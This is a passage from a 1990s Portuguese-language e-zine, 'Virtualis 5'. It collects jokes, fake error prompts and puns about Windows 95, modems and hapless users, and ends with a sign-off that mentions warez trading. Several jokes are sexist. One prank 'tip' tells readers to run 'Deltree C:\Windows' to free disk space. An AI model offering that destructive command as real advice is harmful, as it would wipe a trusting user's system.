bem, podemos comprar o de 28800. DIRETOR- Continua caro! Qual é o mais barato ? SUPORTE- Existe o de 2400, mas é difícil de achar...( já quase explodindo..) DIRETOR - OK ! -vira para secretária - Oooo Fulana faz um cheque de R$ 2400,00 pra compra do modem ! * * * Historia veridica de uma grande coorporação Após a instalação do internet mail ao ver a mensagem padrão da Microsoft o usuário vira radiante para o suporte e exclama: - Puxa já recebi um e-mail da Microsoft.....esse Bill Gates é demais!!!! * * * Arquivo não encontrado... Falsifico? (S/N) * * * O Técnico recebe um telefonema: usuário : - Oi !!! alô... olha e que o meu computador não quer ligar de modo nenhum. Suporte: - Como?! O que o Sr. está fazendo? ligou na tomada?... sim! apertou o botao escrito Power?!...Como? Usuário: - Não apertei não. Eu vi o botao turbo e apertei, como vi que não ligou eu girei a chave e pisei no acelerador pequinininho que tava junto e ai apertei o turbo mas nada... Suporte : ( respiração profunda) Pausa.......... Usuário : (escuta) ....tu tu tu tu tu tu! * * * Muitos falam metendo o pau no windows 95 mas existem muitas razões para nao se pensar assim, 1. o windows tem uma interface grafica bonita 2. o windows tem uma interface grafica bonita 3. o windows....... * * * Qual o sexo dos computadores? Ficou definitivamente comprovado, acima de qualquer duvida: o sexo dos computadores é feminino, são fêmeas. Motivos: 1.Assim que se arranja um, há outro melhor na esquina; 2.Ninguem além do criador é capaz de entender sua lógica; 3.Mesmo os menores errinhos que a gente comete são guardados na memória para futuras referências; 4.A linguagem nativa usada na comunicação entre computadores é incompreensivel para qualquer outra especie; 5.A mensagem : "Bad command or file name" é tão informativa quanto, digamos: "Se você não sabe porque estou com ódio de você, não sou eu quem vai explicar, eh??? 6.Assim que voce opta por um computador, qualquer que seja, você logo se ve gastando a metade do seu contracheque em acessorios para ele. * * * LAPTOPspirose é um vírus transmitido pela urina do MOUSE * * * A pressa é a inimiga da perfeição.Troque seu Pentium pelo meu XT e chegue a perfeição! * * * O técnico no telefone indicando como instalar o windows: --- Insira o terceiro disco no drive. O usuário responde: --- Não dá! Já coloquei dois, não cabe mais. * * * Ah! Aqueles DLLs estavam ocupando muito espaço... * * * dROGA!!oNDE ESTÁ O cAPSLOCK?? * * * Seraqueochefevaidescobrirqueeuderrubeicafénoteclado? * * * Tem coisas, BUM! Que só o Windows 95 apaga pra voce! * * * Já que a primeira impressão é a que fica, então use uma impressora Laser. * * * Papai porque o imã num gruda nesse disquete??? * * * Eu EsToU UsaNDO o RuInDowS 95 Agorra!! * * * Apóie a "Operação Rodízio" também na Internet: dependendo do final de placa do MODEM ele não será autorizado a transitar na Web em determinado dia. Só assim para conseguirmos eliminar os congestionamentos da rede... * * * Meu HD tem 100k de bad sector e 10M de bad-windows. * * * Errar é Humano. Arredondar é Pentium * * * HTTP= Hoje Tá Travando Pacas. * * * Pentium 266Mhz MMX+ SVGA 17' Tela Plana+ Placa de Som 3D Surround= Videogame MUITO CARO!!!! * * * Eu acreditava no sistema, até que formataram minha família... * * * Vírus desamparado procura BBS pra morar… * * * Com o Windows não temos tempo de resposta, temos prazo de entrega * * * P. Se o windows 95 fosse concessionaria que carro venderia? R. BUG, é claro!!! * * * DOS => Dói Ouvir sobre este Sistema ainda... * * * Windows é igual rodízio de carros. Quando você começa a entender, vem alguém e muda tudo de novo. * * * Masoquista que é masoquista, programa em Assembler com Copy Con... * * * Eu também sou multitarefa. Leio no banheiro. * * * O Pateta usa teclado. O Mickey Mouse. * * * Windows95 : Se o seu não dá pau é porque você não sabe usar.. * * * Socorro! Minha Winchester disparou e matou meu mouse! * * * O windows 95 é o maior e mais mal feito vírus conhecido. * * * Checando vírus....todos os vírus estao funcionando perfeitamente. * * * Sabe qual a semelhança entre uma loira o windows95? São burros, só dão problema e só a aparência atrai. * * * Não confunda "MODEM" com "MODES"...o slot é diferente. * * * "640K é suficiente para qualquer um" Bill Gates, 1981 * * * Multi-Tarefa: Estragar muitas coisas na mesma hora... * * * Chip, impossivel comer um só... é horrivel! * * * ORAÇÃO DOS PROGRAMADORES: Sistema Operacional que estais na memória, Compilado seja o vosso programa, Venha à tela os vossos comandos, Seja executada a nossa rotina, Assim na memória, como na impressora. Acerto nosso de cada dia, rodai hoje Informai os nossos erros, Assim como nós informamos o que está corrigido, Não nos deixai entrar em looping, Mas livrai-nos do Dump, Amém. * * * O micro travou? O mouse endoidou? * * * O monitor embaralhou as cores ? Desligue e ligue de novo. Até em Marte funcionou !!! * * * GPF - (Garantido Pela Fabrica) * * * Lei de Lavoisier aplicada à Informática: Na Informática nada se compra, nada se cria! Tudo se copia! * * * Aquele que nunca perdeu um arquivo, que atire o primeiro disquete. * * * Estrada reta, mulher sem curva e modem 14.400 só dão sono. * * * Não tenho tudo que amo... mas meu muambeiro prometeu trazer de Miami! * * * Intel cats have 6.99995634563 lives. * * * MG-DOS: Deleta o trem? (C)laro, uai! (N)ão, sô! * * * Erro ao acessar a FAT. Tento acessar a magrela? (Y/N) * * * Bugs come in through open WINDOWS. * * * MACINTOSH: Machine Always Crashes; If Not, Then OS Hangs. * * * Error: Sector not found -- procurar atrás do sofá? (S/N) * * * Se o seu windows não der problema, reclame com a Microsoft! * * * Windows 95, 95 vezes que terá que reinstalá-lo * * * Windows 95 é que nem sogra, a gente nunca sabe o que pode acontecer. * * * Cuidado com o telível vílus do cebolinha! * * * Mouse não encontrado, bater no gato? (S/N) * * * Teclado não instalado! Presione para continuar. * * * _______________Corte aqui para destruir seu monitor________________ * * * Windows 95 é como irmão mais novo, tá sempre enchendo o saco * * * P. Seu computador está com problema? R. Verifiquei primeiro se o defeito nao é a interface entre o teclado e a cadeira. * * * Computador é como dinheiro em epoca de hiper-inflacao: já fica obsoleto no caminho entre a fábrica e o mercado. * * * Programador órfão procura placa-mãe. * * * Como transformar um DX4 em XT: digite: win * * * O windows não é ruim, esperem só ele ficar pronto * * * O LSD faz o monitor CGA ter 17,6 milhões de cores!! * * * Windows 95: agora para Mega Drive e Nintendo. * * * O Universo por nos conhecido é apenas uma versão beta. * * * Papai, o que significa formatting drive C? * * * Chernobil usava windows 95 para monitorar seus reatores * * * Deltree Windows, THE REAL DOUBLESPACE!!! * * * Namorada grávida: (A) aborta (R) reconhece (F) foge? * * * A mais nova tecnologia de transferência de dados entre computadores é o DPL / DPC ( Disquete Pra La, Disquete Pra Ca ) * * * Reply para cara chato: (I)gnora (M)anda longe (A)tira nele com uma 12? * * * Winchester: Chester for Windows??? * * * RAM = Raramente Adequada Memoria * * * Troco Drive de Cd-Rom single speed por joystick de Odissey!!! * * * UNDELETE *.* /F /I /Z /M /E /R /D /A * * * Vendo micro c/ HD minitorre, teclado de tres teclas, mouse ergonomico, memoria ROM de 8 velocidades, CD de 3 1/2, cooler e FAS/MODEM. * * * Computador de português não tem memória, mas sim, uma leve lembrança. * * * Um homem impressionado com tudo o que o computador era capaz de fazer, de inteligencia tão grandiosa, sentou-se na frente do teclado e escreveu: - Oh! maquina tão maravilhosa, porque não falas ? E a máquina responde: NAO FALO COMPUTO !! * * * "Quanto mais bonito é o espetáculo, maior é a confusão atrás dos bastidores.... (windows95)" * * * Vendo um Pentium de 72 pinos oito Megas. * * * Vendo placa mãe com CHIP SETE da INTEL, breve teremos o CHIP OITO. * * * Tudo o que é bom deve ser lembrado... O que é mesmo Windows? * * * Camisinha furada: (A)bortar (I)gnorar (C)asar? * * * Computador é que nem carroça, sempre tem um burro na frente. * * * Só Jesus salva, Norton faz backup. * * * Sanduiche preferido de micreiro: Xcopy. * * * Inventaram os burros nomades. NOTEBOOKS! * * * Compre um modem: ganhe amigos e perca sua mulher! * * * Tempo de acesso é que nem papel higiênico, termina sempre quando você mais precisa. * * * A verdade está lá fora, alguém sabe a URL? * * * Se Internet está se tornando uma doença, meu destino já está traçado... * * * Devagar e sempre...... a 2400bps * * * Não ouse pegar o telefone para chamar os bombeiros. Estou no meio de um dowload! * * * BBS e Internet: Programas para duplicar sua conta telefônica! * * * Se Bill Gates é um Deus, o Windows deve ser a praga divina. * * * Modems de 2400 Kbps, por favor transitar na pista da direita. * * * A Stuart do Rubinho Barrichelo foi projetada no Windows. * * * Que fio é ess<=V++088.../NO CARRIER * * * Acelere seu Windows pela window do décimo andar. * * * Já notaram que o Windows roda rápido? ... Nem eu! * * * Seu PC deu problemas? Que se dane! Quem mandou instalar o Windows 95! * * * ID4: a nave alienigena que caiu nos anos 50, era controlada pelo Windows 3.1, a última frase do piloto antes da nave cair foi: o que é GPF? * * * Fiat, peidos e Windows, só os donos gostam! * * * O shampoo contra calvice do Espiridião Amin foi feito no Windows. * * * O alicerce da Torre de Pizza foi calculado no windows. * * * OS/2 VirusScan - Windows found: Remove it? (Y/Y) * * * eU connsigg diggtar 400 caratereteres porr minoto. * * * Windows 95. A graça de quem vê, a desgraça de quem usa! * * * O Windows 95 é REALMENTE um sistema operacional multitarefa. É o único que consegue formatar um disquete e travar o micro ao mesmo tempo! * * * Windows? What's Windows? I use OS/2! (Bill Gates) * * * Eu gostaria de criar homepages, mas não sei o que elas comem. * * * De onde viemos? Para onde vamos? Será que lá tem internet? * * * P. Sabe por que a Intel não chamou o Pentium de 586? R. É porque quando eles somaram 486 com 100 deu 585.732691! * * * Nova tecnologia de periféricos: Plug-and-PRAY! * * * WWW - Wait,wait,wait * * * Placar: Windows 95 X OS/2 * * * A vida começa aos 14.400 Kbps, mas a maioridade só vem aos 33.600 Kbps * * * HTML - Hoje Tá Mais Lento * * * Amar é... deletar o Windows do winchester dela! * * * A primeira conta telefônica depois do modem a gente nunca esquece. * * * O computador surgiu para resolver problemas que antes não existiam * * * O significado da sigla CICS-VS e: Como Isso Cai Sempre - Viu Só? * * * Falando em "CICS", quando vai sair o "SEVEN"??? * * * Pra que eu preciso de drogas??Ja tenho meu 286... * * * Jamais deixe o computador pensar que voce esta com pressa * * * US-Robotics ? Pra quê??!! O meu Zoltrix é ÓTI%@#@*&$^#@@!@&@!*!( * * * Se não consegue acertar,o problema é o BIOS, Bichinho ignorante operando o sistema * * * Putz!Quebrouaminhabarradeespaco * * * Voce já sorriu para o seu computador hoje? Já?? Mas que imbecil!!! * * * Stacker: Compactando Dados e Expandindo Problemas. * * * Troco 286 com monitor por um pacote de bolacha Maria. Volto diferença! * * * Voce tem um micro ?!? O meu é enorme... * * * Pirataria é crime. Nao ataque navios. * * * Eu sou um cobra em Informatica.... Vivo rastejando e ainda levo paulada! * * * Quer liberar mais espaço em disco? Digite: Deltree C:\Windows e tecle ENTER! * * * 200 vezes pior que o OS/2? Só o AS/400. * * * P. Qual a diferença entre o vírus e o Windows 95? R. O vírus funciona. ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ ¬ ¬ ¬ E O F ¬ ¬ ¬ ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ É isso. Espero que tenham gostado. Espero estar de volta em breve. Não deixem de assinar a VIRTUALISTA !!! Alterações no site, notícias quentes de hpvac, negociações de warez, e muito mais a disposição da comunidade virtualis !!! Hasta la vista !!! ====================== Final da Virtualis 5 ========================= VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS .VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALI S VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUAL IS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUA LIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTU ALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRT TUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VI RTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS V IRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS. VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS VIRTUALIS ====================== Final da Virtualis 5 =========================